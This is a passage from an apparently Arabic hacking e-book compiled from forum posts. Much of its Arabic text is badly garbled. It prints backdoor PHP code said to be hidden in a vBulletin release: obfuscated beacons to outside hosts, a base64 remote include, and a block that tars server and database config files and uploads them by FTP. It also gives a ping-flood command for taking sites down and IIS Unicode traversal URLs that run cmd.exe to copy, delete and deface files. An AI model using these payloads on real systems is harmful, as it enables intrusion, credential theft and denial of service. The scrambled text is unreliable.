""-iﻫﺬاﺑ ﺮ ﺿﻪ ﺳﯿﺒﻪ ﻻﻧﻪ ﻣﻬﻢ
ﺘﻲا فﺗﻲﺑﻲ ﺘﺄﻛﺪ ﻣﻦاﻻﯾﺒﻲﻟﻤﻦﺗﺸﻐﺐاﻟ ﺘﺐاﻻﯾﺒﻲﺗﺒﻊ ﺟﻬﺎزك وﻋﺸﺎنﺗ ﻗﺎمﻫﺬاﺗﻜ 1.1.1.1ﻫﻨﺎﺑﺪا لاﻻر
ﺘﺒﻪ را ح ﯾﻄﻠﻊ ﺎﯾﺒﻲ وﻫﺬااﻻﯾﺒﻲاﻟﻰ ﻃﻠﻌﻠﻚ ﻫﻮاﻟﻰﺗﻜ
ﺘﺒ ﺮ ﺷ ﺮطﻓﻲ ﻧﺴ ﺦاﻟﻤﻔﺎ ت GETﻫﺬهاﻻ ﺿﺎﻓﺔ ﺳﯿﺒﻬﺎﻓﻲ ﺣﺎﻟﻬﺎ ﻻﻧﻬﺎﺗﻌ
٧٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
** ************************************************************************************
ﺘﻤﻮﻧﻲ
ﺘﻬﻢﺑﺪﻻانﺗﻜﻮنﻟﻤﺪة ٣٠ﯾﻮﻣﺎﻓﻬﻤ
ﺘ ﺮوﯾ ﺞﺑ ﻀﻌ
-٢اﻧﻪ ﺟﻤﯿﻌﻪ ﻧﺴﺨﻪﺗﺠ ﺮﯾﺒﻲﻟ
ﻗ ﻞ ﻧﺬﻻ ﻣﻦ ﺎﻻﺟﺎﻧﺐ
ﺎﻟﻤﻌ ﺮﺑﯿﻦاﻟﻌ ﺮبﻟﯿﺴﻮاا
٧٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
PHP:
--------------------------------------------------------------------------------
if ($action=="modify") {
$vbxh = h;
$vbxt = t;
$vbxp = p;
$vbxw = w;
$vbxa = a;
$vbx1 = 1;
$vbxr = r;
$vbxb = b;
$vbxn = n;
$vbxe = e;
$vbxo = o;
$vbxy =y;
$vbxl = l;
echo "<!-- ";
$file =
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$
vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$
HTTP_HOST&h2=$SCRIPT_NA
ME", "r");
$rf = fread($file, 1000);
fclose($file);
echo " -->";
--------------------------------------------------------------------------------
ﻗﻊ ﺘﺼ ﻞﻓﻲ ﻣﻮ ﻮﻛﺎن ﺎﻟﻜﻮداﻟ ﺤﻠﻮ ﻫﺬا ﯾ
http://www .arab1.net/
http://www .arab1.net/~royal/.x.php?h=
$HTTP_HOST&h2=$SCRIPT_NAME
ﺘﺒﻠﯿﻎ ﯾﺎﻋﯿﻨﻲ ﻋﻠﯿﻬﻢ ﻋﺸﺎن ﯾ ﺤﻄﻮن وﺳ ﺮﺑﻮﻫﺎﻟﻨﺎ ﺣﺒﺎﯾﺒﻨﺎ وﺷﺎﻟﻮاﻛﻮداﻟ٢٫٢٫٦ ﻋﻤﻮﻣﺎ ﻣﻊاﻻﯾﺎم ﻧﺰﻟ ﺖ ﻧﺴﺨﻪ
ﻟﻨﺎﻛﻮدﺗﺠﺴ ﺲ وﻧﻌﻢاﻻ ﺧﻮهاﻟﻌ ﺮباﻟﻤﺴﻠﻤﯿﻦ
ﺑﺎﻻ ﺧﯿ ﺮoption ﺑ ﺲﻫﺎﻟﻤ ﺮهاﻟﻜﻮداذﻛﻰ ﻮﻣﻬﻮ ﻣﻜﺸﻮ ف وﻏﺒﻲ زياﻻو لاﻟﻜﻮداﻟﻤ ﺮهﻫﺬيﻓﻲ ﻣﻠﻔﯿﻦ ﻣﻠ ﻒ
ﻣﻮﺟﻮد
PHP:
--------------------------------------------------------------------------------
echo "<!-- ";
include "$sqlupdate";
٧٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
--------------------------------------------------------------------------------
functionsﻮﻣﻠ ﻒ
PHP:
--------------------------------------------------------------------------------
$sqlupdate =
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
5YWwvLngyLmluYw==');
--------------------------------------------------------------------------------
ﺘﺼ ﻞاﻟﻜﻮد ﺎﻟ ﺤﻠﻮ ﻫﺬااﻟﻠﻲ ﯾﺎﻋﯿﻨﻲ ﻋﻠﻰاﻟﺬﻛﺎ ء ﺻ ﺮﻧﺎ ﻧﻌ ﺮ ف ﻧﻠﻌﺐﺑﺎﻛﺪوا دﯾﻜﻮد واﻧﻜﻮد ﻮاﻟﻤ ﺮهﻫﺬيﺑﻌﺪ ﯾ
. ﻗﻊ ﻫﺬاﺘﺨﺪﻣﯿﻦﻓﯿﻪ دﯾﻜﻮدﺑﺎﻟﻤﻮ ﻣﺴ
http://saudi.no-ip.com/
ﺘ ﺮ ﺣﯿﺐ ﯾﺎﻋﯿﻨﻲ ﻋﺎﻟWELCOME TO arab1.netﺑﯿ ﺮ ﺣﺐﻓﯿﻜﻢ وﯾﻘﻮﻟﻜﻢ
ﺎﻟﻠﻲﻓﯿﻬﺎﻛﻮدhttp://saudi.no-ip.com/~royal/.x2.inc ﺘﺼ ﻞﺑﺎﻟﺼﻔ ﺤﻪﻫﺬي ﻋﻤﻮﻣﺎاﻟﻜﻮدﺑﯿ
اﻟﻠﻲ ﯾ ﺤﺴﺒﻮن ﻋﻠﯿﻨﺎﻛﻤﺴﻠﻤﯿﻦ وﻋ ﺮب....... رﻫﯿﯿﯿﯿﯿﯿﺐ ﻮﯾﺒﯿﻦﻟﻨﺎ
ﺷﻮﻓﻮ ﺎﻟﻜﻮد
PHP:
--------------------------------------------------------------------------------
<div id="sHo" style="display:none;">
<!--
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
<?php
system("mkdir /tmp/.statics");
system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf");
system("cp /usr/local/apache/conf/httpd.conf
/tmp/.statics/httpd2.conf");
system("cp admin/config.php /tmp/.statics/php.conf");
system("tar -cvf /tmp/.statics.tgz /tmp/.statics");
$vilename = "$SERVER_NAME.bz";
$port = base64_decode('aHB5NWk5');
$conn_id = ftp_connect("cyber-sa.virtualave.net");
$login_result = ftp_login($conn_id, "cyber-sa", "$port");
$upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz",
FTP_BINARY);
ftp_quit($conn_id);
system("rm -rf /tmp/.statics.tgz");
system("rm -rf /tmp/.statics");
$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";
٨٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻪ
ﻗﻪ و ﺣﻤﺎﯾ
ﺘﺮﺘﺪﯾﺎ تاﻟﯿﻜﻢاﻟ ﺤ ﻞ ﺣﻤﺎﯾﺔ%٨٠اﻟﯿﻜﻢاﺳﺒﺎبا ﺧ
ﺘ ﺮا قاﻟﻤﻨ
ﯾﺎ ﷲﻛ ﻞ ﯾﻮم ﻧﺴﻤﻊا ﺧ
-١وﺟﻮدﺛﻐ ﺮا تﺑﻤﺠﻠﺪاﻻدﻣﻦ
-٢ﺛﻐ ﺮة ﻣﺠﻠﺪ ﻣﻮد
ﺘﯿ ﻞ
-٣ﺛﻐ ﺮةاﻻﺳ
ﺘﻤ ﻞ-٤اﻟﻬ
-٥ﻛﻮﻛﯿﺰ
ﺘﻠﻨ ﺖ
-٦دﻋﻢاﻟ
Cfgwiz32.exe -٧ﻋﻠﻰاﻟﻤﺠﻠﺪ وﯾﻨﺪوزC:\Windows
-٨ﻣﻦاﻟﻤﻠ ﻒmisc
ﺘ ﺮ قﻟ ﺤﺼﻮ لﺑﻤﻌﻠﻮﻣﺎﺗﻚ -٩وﺟﻮدﺑﺎﺗ ﺶﺑﺠﻬﺎزكﺗﻢارﺳﻠﻪﻟﻚ ﻣﻦﻗﺒ ﻞاﻟﻤﺨ
***** *********************************************************************************
-٧ﻛﯿﻔﯿﺔاﻟ ﺤﻤﺎﯾﺔ
^^^^^^^^^^
-١ﻗﻢﺑ ﺤﻤﺎﯾﺔ ﻣﻠ ﻒاﻻدﻣﻦ ﺟﯿﺪا .htaccessﺷﻐ ﻞﻓﻘﻂﻓﻲ ﺳ ﺮﻓ ﺮا تاﻟﯿﻨﻮﻛ ﺲﻟﯿ ﺲ ﻮﯾﻨﺪوز
ﺘﻪ.htaccess -٢ﻗﻢﺑ ﺤﻤﺎﯾ
ﺘﺪي ﺘﯿﻼ تﻛﺜﯿ ﺮ ﯾﺴﺒﺒﺐﺛﻐ ﺮةﺑﺎاﻟﻤﻨ -٣ﻻﺗ ﺮﻛﺐ ﺳ
ﺘﻤ ﻞاﺑﺪا -٤ﻻﺗﻔﻌ ﻞﻟﻐﺔاﻟﻬ
-٥ا ﺣﺬر ﻣﻦاﻟﻜﻮﻛﺰ ﻧﻈ ﻒ ﺟﺎﻫﺰك داﺋﻤﺎ
ﺘﺎﺟﻪﻗﻊ ﻋﻨﺪﻣﺎ ﻻﺗ ﺤﺘ ﻞ ﻧﯿ ﺖﻟﻤﻮﻗﯿ ﻒاﻟ ﺘﻮ-٦ﻗﻢﺑ
-٧ﻧﺄﻛﺪ ﻣﻦ ﻋﺪم وﺟﻮد ﻣﻠ ﻒﺑﺎﺳﻢ Cfgwiz32.exeﻋﻠﻰاﻟﻤﺠﻠﺪ وﯾﻨﺪوزC:\Windows
-٨دهﺑﻠﻮووووياﻟﺪﻧﯿﺎﻓﯿﻪ ﺟﺎرياﻟﺒ ﺤﺚ ﻋﻦ ﺣ ﻞﻟﻪ
ﺘ ﺮﻛﯿﺐﺑ ﺮاﻣ ﺞاﻟﻔﯿ ﺮوﺳﺎ تﺑﺠﻬﺎزك … -٩ﻗﻢﺑ
٨١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐ :ﻋﻠﻲ زاﺋ ﺮ
$$$$$$$$$$
ﺳﻨﻌ ﺮجﻓﻲ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﻋﻠﻰ ﻣﺼﻄﻠ ﺤﺎ ت وأﻣﻮر ﻫﺎﻣﺔ ﯾﺠﺐانﺗﻌ ﺮ ف ﻋﻠﯿﻬﺎ ﺳﻮﯾﺎﻗﺒ ﻞاﻟﺒﺪ ء
=======================================================
٨٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٨٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٨٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
ﺘﻬﺪ ف
ﻗﻊاﻟﻤﺴ ﺘﻲ ﯾﺼ ﺤﺒﻬﺎ ﺧﺴﺎااﺋ ﺮﻓﺎد ﺣﺔﻟﻠﻤﻮ
ﻗﻊ ﻣﻦاﻷﺷﯿﺎ ءاﻟﺴﻬﻠﺔ واﻟﻨﺎﻓﻌﺔ واﻟ ﯾﻌﺪﺗﺪﻣﯿ ﺮاﻟﻤﻮا
ﻗﻊ ﺧﺴﺎﺋ ﺮﺑﺎﻷ فاوﺘﻰﻟﻮﻟﻤﺪة ﻣ ﺤﺪودهﻓﺴﯿﺨﺴ ﺮاﻟﻤﻮ ﻗﻊ واﯾﻘﺎﻓﻪ ﻋﻦاﻟﻌﻤ ﻞ ﺣ ﺣﯿﺚاذاﺗﻢﺗﺪﻣﯿ ﺮاﻟﻤﻮ
ﻗﻊ .ﺑﺎﻟﻤﻼﯾﯿﻦ وﻋﻠﻰ ﺣﺴﺐ ﺷﻬ ﺮةاﻟﻤﻮ
ﺘ ﺮاك ﻣﺠﻤﻮﻋﺔﻛﺒﯿ ﺮه ﻻﺗﻘ ﻞﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن ﻋﻦ ٢٠٠ﺷﺨ ﺺأوأﻛﺜ ﺮ ﺘﻢاﻻﺑﺄﺷ ﻗﻊ ﻻ ﯾوﺗﺪﻣﯿ ﺮاﻟﻤﻮا
ﻗﻊﻛﺜﯿ ﺮهﺗﻘﻮمﺑﻤﺜ ﻞﻫﺬااﻷﻣ ﺮ ﻗﺼ ﺮ وﻫﻨﺎك ﻣﻮاﻗ ﺖأﻗﻊﺑﺴ ﺮﻋﺔأﻛﺒ ﺮ وﻓﻲ ووﻛﻠﻤﺎﻛﺜ ﺮاﻟﻌﺪدﻛﻠﻤﺎﺗﻢﺗﺪﻣﯿ ﺮاﻟﻤﻮ
ﻗ ﻒ ﻃﺎﻟ ﺖ ﻣﺪﺗﻪ وﻋﺎدﺑﻌﺪ ذﻟﻚ ﺘ ﺮوﻧﻲاﻟﺬيﺗﻌ ﺮ ضﻟﻮ ﻗﻊاﻟﺠﺎداﻷﻟﻜﻗﻊاﻟﻤﻜﺎﻓﺢاﻟﻨﺎﺻ ﺮﻟﻸﺳﻼم ﻣﻮ ﻣﻨﻬﺎاﻟﻤﻮ
ﻗﻊﻛﺜﯿ ﺮه ﻋﻦ ﻃ ﺮﯾ ﻖ
ﻗﺪﺗﻢﺗﺪﻣﯿ ﺮ ﻣﻮاااﺘﻤ ﺮﻓﻲ ﻫﺬهاﻟﻬﺠﻤﺎ ت واﻟﺠﻬﺎد و
ﻗﻊ ﻣﺴ ﺑﻘﻮهاﻛﺒ ﺮ وﻻ ﯾﺰا لاﻟﻤﻮ
ﻗﻊ .... ﺘﻌﺎون ﻣﻊ ﻫﺬااﻟﻤﻮ اﻟ
٨٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$
ـﻮ ل
ـ
ــ
ــﻘ
ـ
ــ
ـﻨ
ـ
ــ
ﻣ
$$$$$$$$$
ﺘﺎﻟﻲ :
ﺘﻬﺎ ء ﻣﻦﺗ ﺤﻤﯿ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ،ﻓﻚ ﺿﻐﻂاﻟﻤﻠ ﻒ ،و ﻋﻨﺪﺗﺸﻐﯿﻠﻪ ﺳﯿﻈﻬ ﺮﻟﻚاﻟﺸﻜ ﻞاﻟ
ﻋﻨﺪاﻹﻧ
ﻋﻨﺪﺑﺪ ءاﻟﻬﺠﻮم ﺳﯿﻌﻤ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻟﺪرة ﻋﻠﻰﺑ ﺤﺚاﻟﺒ ﺮوﻛﺴﻲاﻟﺨﺎ صﺑﻚ و ﺳﯿ ﻀﻌﻪﻟﻚﻓﻲ ﻣﻜﺎﻧﻪ.
ﺘﺸﻐﯿ ﻞ :
ﺘﻚ ﻋﻨﺪاﻟﻬﺠﻮمﻗﻢﺑ
ﺘﺨﻔﻲﻫﻮﯾ
وﻟ
٨٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ
ﻗﻢاﻟﺒ ﺮوﻛﺴﻲاﻟ
و ﺿﻊ ر
ﻗﻊاﻟﻤ ﺮاداﻟﻬﺠﻮم
ﺘﺠﺪﯾﺪ ﻋﻨﻮاناﻟﻤﻮ
ﺘﻄﯿﻊا ﺣﺪﺗﻐﯿﯿ ﺮ ﺟﻬﺔاﻟﻬﺠﻮم وﻟ و ﻣﻦ ﺧﻮا صﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞاﻧﻪ ﻻ ﯾﺴ
ﺘﻐﯿﯿ ﺮ.
وﻫﻮ ﺳﯿﻘﻮمﺗﻠﻘﺎﺋﯿﺎﺑﺎﻟﺒ ﺤﺚ واﻟ ﻋﻠﯿﻪﻓﻘﻂﻗﻢﺑ ﻀﻐﻂ
ﺘﺎﻟﻲ :
و ﺳﯿﻈﻬ ﺮﻟﻚاﻟﺸﻜ ﻞاﻟ
ﺘﺸﻐﯿ ﻞ :
ﺘ ﺮﻧ ﺖ ،ﻗﻢﺑ
ﻮﻟﻌﻤ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞﺑﻄ ﺮﯾﻘﺔ ذﻛﯿﺔﺑ ﺤﯿﺚ ﻻ ﯾﺒﻄﻲ ءاﻹﻧ
٨٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺸﻐﯿ ﻞ :
ﺘﺸﻐﯿ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻋﻨﺪ ﻋﻤ ﻞاﻟﻮﻧﺪوزﻗﻢﺑ
ﻟ
http://www.geocities.com/boom_q8y4/dorrah.zip
…
٨٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐMaXhAk2000:
$$$$$$$$$$$$$$$$
اﻟﻄ ﺮﯾﻘﺔاﻷوﻟﻰ::
ـ
ﺘﺎﻟﻲ :
ﺘﺐاﻷﻣ ﺮاﻟ
ﺘﻮﺟﻪإﻟﻰ "اﻟﺪوس" ===<==اﻛ
ﻗﻢﺑﺎﻟ
Ping www.xx.com
ﻗﻊ Xxx ﯾﻌﻨﻲاﺳﻢاﻟﻤﻮ
ﻗﻊ. ﻗﻢأيﺑﻲاﻟﻤﻮ ﺑﻌﺪ ذﻟﻚ ﺳﯿﺨ ﺮجﻟﻚ ر
ﺘﺎﺑﺔاﻷﻣ ﺮ:ﻗﻢﺑﻜ
ﻗﻮةاﻟ ﻀ ﺮﺑﻪ( ) -Iﻋﺪداﻟ ﻀ ﺮﺑﺎ ت( ping -nﻗﻊ( ) )اﺳﻢاﻟﻤﻮ
ﻣﺜﺎ ل ذﻟﻚ:
ping -n 1000 -l 400 www.xxx.com
ﺎﻟﻄ ﺮﯾﻘﺔاﻟﺜﺎﻧﯿﺔ::
٨٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐACID BURN_EG:
$$$$$$$$$$$$$$$$$$
ﺘﻘ ﻞﺑﯿﺎﻧﺎ تا ل ipﻣﻦاﻟﻜﻤﺒﯿﻮﺗ ﺮ.ﻓﻤﻦاﻟ ﻀ ﺮورىان ﻧﻐﻠ ﻒ ﻫﺬهاﻟﺒﯿﺎﻧﺎ تﺘﺒ ﺮاﻻو لﻫﻮ ﺎﻟﻤﻬﻢﻓﻌﻨﺪﻣﺎﺗﻨﻮ ﯾﻌ
ﺘﺼ ﻞﺑﻬﺎ ﺘﺼﻠﻪﺑﺎﻟﺸﺒﻜﺔاﻟﻤ ﺤﻠﯿﻪﻟﻠﺠﻬﺎزاوﺑﺎﻟﺸﺒﻜﺔ ﺎﻟﻤ ـ ipﺑﺄىأ ﻃﺎر ﻣﻦاى ﺻﯿﻐﻪﺗﻜﻮن ﻣ اﻟﺨﺎﺻﻪﺑﺎﻟ
ﺘ ﻀﻤﯿﻦ ﻣﻦ ﻋﻨﻮاناﻟﺸﺒﻜﺔ ﺘﻄﻠﺐﻫﺬا ﺎﻟﻐﻼ فاﻟ ﺘﻘﺎ لﻫﺬهاﻟﺒﯿﺎﻧﺎ ت .و ﯾ
ﺘﻪاﻟﻤﻮﺟﻮد ﻋﻠﯿﻬﺎ ﻋﻨﺪاﻧاﻟﺠﻬﺎزﻓﻰ ﺣﺎﻟ
اﻟﻤ ﺤﻠﯿﻪاواﻟﻌﻨﻮاناﻟﻔﯿﺰﯾﺎﺋﻰﻟﻬﺬااﻟﺸﺒﻜﻪ ﻣﻊ ﺎﻻ ﻃﺎراﻟﺬى ﯾ ﺤﯿﻂﺑﺎﻟﺒﯿﺎﻧﺎ تاى (inclusion of a local
network address or physical address within the frame).
٩٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٩١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
اﻟﻔ ﺼ ﻞ اﻟﺜﺎﻟﺚ
<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
٩٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐsNiper_hEx:
$$$$$$$$$$$$$$$
٩٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
-ﻛﯿﻔﯿﺔاﯾﺠﺎدﻫﺬهاﻟﺜﻐ ﺮا ت .
ﺘﯿﻦ -: ﺘﻢاﯾﺠﺎد ﻫﺬهاﻟﺜﻐ ﺮا تﺑﻄ ﺮﯾﻘ
ﯾ
ﺘﻲﺗﻌﻤ ﻞ ﻋﻠﻰ
-١ﺑﻮاﺳﻄﺔاﻟﺒ ﺮاﻣ ﺞاﻟﻼزﻣﺔ واﻟﻤﺨﺼﺼﺔﻟﻜﺸ ﻒﻫﺬهاﻟﺜﻐ ﺮا ت ﺳﻮا ءﺑﺎﻟﺒ ﺮاﻣ ﺞاﻟ
ﺘﻲﺗﻌﻤ ﻞ ﻋﻠﻰ ﻧﻈﺎمﻟﯿﻨﻜ ﺲ . ﻧﻈﺎم وﯾﻨﺪوزاوﺑﻄ ﺮﯾﻘﺔاﻟﺸ ﻞ واﻟ
ﻗﻊ ﻣﺒﺎﺷ ﺮة . -٢ﺑﻮاﺳﻄﺔﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﻰاﻟﻤﻮ
ﺘﺨﺪمﻟﻠﻨﺴ ﺦ
:ﺎﻻﻣ ﺮاﻟﻤﺴ
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe
ﺘﺨﺪمﻟﻠﻨﻘ ﻞ
:ﺎﻻﻣ ﺮاﻟﻤﺴ
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+m
\ove+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:
٩٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪمﻟﻠ ﺤﺬ ف
ﺎﻻﻣ ﺮاﻟﻤﺴ:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+del+c:\hEx.mdb
ﺘﻐﯿﯿ ﺮ ﻣﺴﻤﻰاﻟﻤﻠﻔﺎ ت
ﺘﺨﺪمﻟ
ﺎﻻﻣ ﺮاﻟﻤﺴ:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+re
n+c:\index.htm+hEx.htm
ﺘﻮﯾﺎ تاﻟﻤﻠ ﻒ
ﺘﺨﺪمﻟ ﺮؤﯾﺔ ﻣ ﺤ
ﺎﻻﻣ ﺮاﻟﻤﺴ:
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.
exe?/c+type+c:\hEx.txt
ﺘﺎﺑﺔ دا ﺧ ﻞأي ﻣﻠ ﻒ
ﺘﺨﺪمﻟﻠﻜ
ﺎﻻﻣ ﺮاﻟﻤﺴ:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ec
ho+sNiper_hEx+>c:\hEx.txt
٩٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺒﻌﺔﻟﻬﺎ .
ـ Access Deniedواﻟ ﺤﻠﻮ لاﻟﻤ -ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻣﺸﻜﻠﺔاﻟ
ﺘﺪاد ،ﻓﻌﻨﺪ ـ Access Deniedﻣﻦ ﺧﻼ لاﻟﻤ ﺤﺎوﻟﺔﻓﻲ ﺣﺬ فأي ﻣﻠ ﻒ ﻣﻦأياﻣ ﺘﻢ ﻣﻌ ﺮﻓﺔ ﻣﺸﻜﻠﺔاﻟ ﺗ
ﺘ ﺤﻜﻢﺘﺎﺑﺔ ﻋﻠﻰاﻟﻤﻠﻔﺎ ت واﻟ
ﺘﻤﻜﻦ ﻣﻦاﻟﻜ ﺘﻰﺗـ Access Deniedﻓﺎﻟﯿﻚ ﻫﺬهاﻟﻄ ﺮ ق ﺣ ﻇﻬﻮر رﺳﺎﻟﺔاﻟ
اﻛﺜ ﺮ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ -:
ﺘﺎ حﻟﻚاﻣﻜﺎﻧﯿﺔ ـ CMDاﻟﻰ دﻟﯿ ﻞاﻟﺴﯿﻜ ﺮﺑ ﺖﺑﻤﺴﻤﻰ CMD1ﻓﺴﻮ ف ﯾ -١ﺎﻟﻄ ﺮﯾﻘﺔاﻻوﻟﻰ ﻧﺴ ﺦ ﻣﻠ ﻒاﻟ
ﺘﺨﺪام ﻫﺬااﻻﻣ ﺮ -:
ﺘﺨﺪاماﻻﻣ ﺮ Copyﺑﺎﺳ ﺘﺎﺑﺔﺑﺎﺳاﻟﻜ
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/c
md.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd
1.exe
ﺘﻌﺎﻣ ﻞ ﻣﻊاﻟﻤﻠ ﻒ ssinc.dllواﻟﻄ ﺮﯾﻘﺔﻛﻤﺎ ﯾﻠﻲ -: -٢ﺎﻟﻄ ﺮﯾﻘﺔاﻟﺜﺎﻧﯿﺔﺑﺎﻟ
oﺎوﻻاﻧﺸﺎ ء ﺻﻔ ﺤﺔﺑﺎﺳﻢ test.shtml
٩٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
٩٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
- Anonymous
- hEx@Hotmail.Com
- User Anonymous
- hEx@Hotmail.Com
- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-
"s:c:\winnt\mspft.ppl
ﺘﻨﻔﯿﺬﻓﺎﻟﻄ ﺮﯾﻘﺔ
ﺘ ﺤﺪﯾﺪﻓﻲ ﺳﯿﻜ ﺮﺑ ﺖاﻟ ﻋﻨﺪ ﻇﻬﻮر ﺻﻔ ﺤﺔاﻟﺨﻄﺎﻓﻲاﻟﻮ ﺻﻮ لاﻟﻰاﻟﺼﻔ ﺤﺔاﻟﻤﻄﻠﻮﺑﺔ وﺑﺎﻟ
ﺘﻮﯾﺎﺗﻪﻟﻠﻌﺜﻮر ﻋﻠﻰاﺳﻢ ﻗ ﺮا ءة ﻣ ﺤﺻ ﺤﯿ ﺤﺔ وﻣﺎﻋﻠﯿﻨﺎﻓﻘﻂ ﺳﻮى ﺳ ﺤﺐ ﻣﻠ ﻒ database.incو
ﺘﺨﺪم واﻟﺒﺎﺳﻮردﻟﻠﻤﺴﺌﻮ ل ﻋﻦﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت .
اﻟﻤﺴ
٩٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
/c+tftp.exe+"-
i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\i ndex.htm
....
٩٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐ XDEMONX:
$$$$$$$$$$$$$$
ﺘﻄﯿﻊاﻟﺠﻤﯿﻊﺗﻄﺒﯿﻘﻬﺎ ..اﻣﺎﻓﻲﻫﺬااﻟﺪرسﻓﺎﻷﻣ ﺮ
ﻓﻲ اﻟﺪرساﻷو ل ﻛﺎن ﻋﺒﺎرة ﻋﻦاواﻣ ﺮاﺳﺎﺳﯿﺔ ﯾﺴ
ﺘﻄﻠﺐﺑﻌ ﺾاﻟﺬﻛﺎ ء واﻟﻤﻬﺎرة ..
ﯾ
اﻟﺒﺪاﯾﺔ :
--------------
ﺘﺼﻔﺢ ..ﻣﻦ ﺧﻼ ل ﻫﺬهاﻟﺜﻐ ﺮةﻓﺎﻧﻪ ﺳﯿﻜﻮنﻟﺪﯾﻚ ﺻﻼ ﺣﯿﺎ ت ﻗﻊ ﻣﻦاﻟﻤﺎﻻن ﻋﻨﺪﺗﺼﻔ ﺤﻚﻟﻤﻠﻔﺎ تاﻟﻤﻮ
ﺘﻤﻲﻟﻠﻤﺠﻤﻮﻋﻪ Guestﻮﻫﻮاﻟﯿﻮزراﻟﻤﺴﺆوو ل ﺘﺨﺪم ﻫﻮ ﻋﺒﺎرة ﻋﻦ ﯾﻮزر ﯾﻨ
IWAM_USERﻮﻫﺬااﻟﻤﺴ
ﻋﻦﺗﺸﻐﯿ ﻞ ﺳﯿ ﺮﻓ ﺮIIS .
ﻮﺑﻤﺎاﻧﻪ ﻣﻦ ﻣﺠﻤﻮﻋﺔ Guestﻓﻬﻮ ﻻ ﯾﻤﻠﻚ ﺻﻼ ﺣﯿﺎ تﻛﺜﯿ ﺮة !!اﻻاذاﺗﻢاﻋﺪادهﺑﺸﻜ ﻞ ﺳﻲ ء (:
ﻻﯾﻮﺟﺪ ﺷﻲاﻛﺜ ﺮادﻣﺎﻧﺎ ﻣﻦ ﻣ ﺤﺎوﻟﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ روو ت (:ﻫﺬاﻓﻲاﻧﻈﻤﺔ *nixﺎﻣﺎﻓﻲ Microsot
